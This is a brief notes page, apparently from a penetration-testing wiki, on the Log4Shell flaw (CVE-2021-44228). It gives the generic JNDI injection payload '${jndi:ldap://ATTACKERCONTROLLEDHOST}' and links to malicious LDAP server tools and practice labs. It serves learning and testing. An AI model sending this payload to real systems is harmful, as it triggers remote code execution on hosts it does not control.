Apache Log4j

Exploiting Apache Java logging framework

CVE-2021-44228

LogoNVD - CVE-2021-44228

On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this log4j version. This attack has been dubbed "Log4Shell"

LogoGitHub - YfryTchsGD/Log4jAttackSurfaceGitHub
LogoHuntress - Log4Shell Tester

The general payload to abuse this log4j vulnerability. The format of the usual syntax that takes advantage of this looks like:

${jndi:ldap://ATTACKERCONTROLLEDHOST}

LDAP Referral Server

LogoGitHub - mbechler/marshalsecGitHub
LogoGitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacksGitHub

Resources/POC

LogoTryHackMe | Solar, exploiting log4jTryHackMe
LogoWrite-Up: Hack The Box: Starting Point — Unified (Tier 2)Medium
PreviousVulnhub/ PG/ THM/ HTBNextLinux Forensics Cheatsheet

Last updated

Was this helpful?